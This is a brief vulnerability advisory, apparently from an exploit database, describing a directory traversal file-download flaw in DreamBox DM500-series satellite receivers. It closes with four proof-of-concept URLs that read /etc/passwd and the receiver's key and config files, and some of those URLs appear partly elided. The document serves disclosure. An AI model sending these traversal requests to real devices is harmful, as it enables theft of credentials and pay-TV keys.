studiati,studiati si iar studiati...............

DreamBox DM500(+) Arbitrary File Download Vulnerability


Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM500, DM500+, DM500HD and DM500S

Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).

Desc: Dreambox suffers from a file download vulnerability
thru directory traversal with appending the '/' character
in the HTTP GET method of the affected host address. The
attacker can get to sensitive information like paid channel
keys, usernames, passwords, config and plug-ins info, etc.

Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma

www.exploit-db.com/exploits/17279/


22.12.2010


--------------------------------------------------------------------

http://192.168.1.102/%2f..%2f..%2f...../etc/passwd%00
http://192.168.1.102/%2f..%2f..%2f.....oupdate.key%00
http://192.168.1.102/%2f..%2f..%2f.....amd3.config%00
http://192.168.1.102/%2f..%2f..%2f...../camd3.keys%00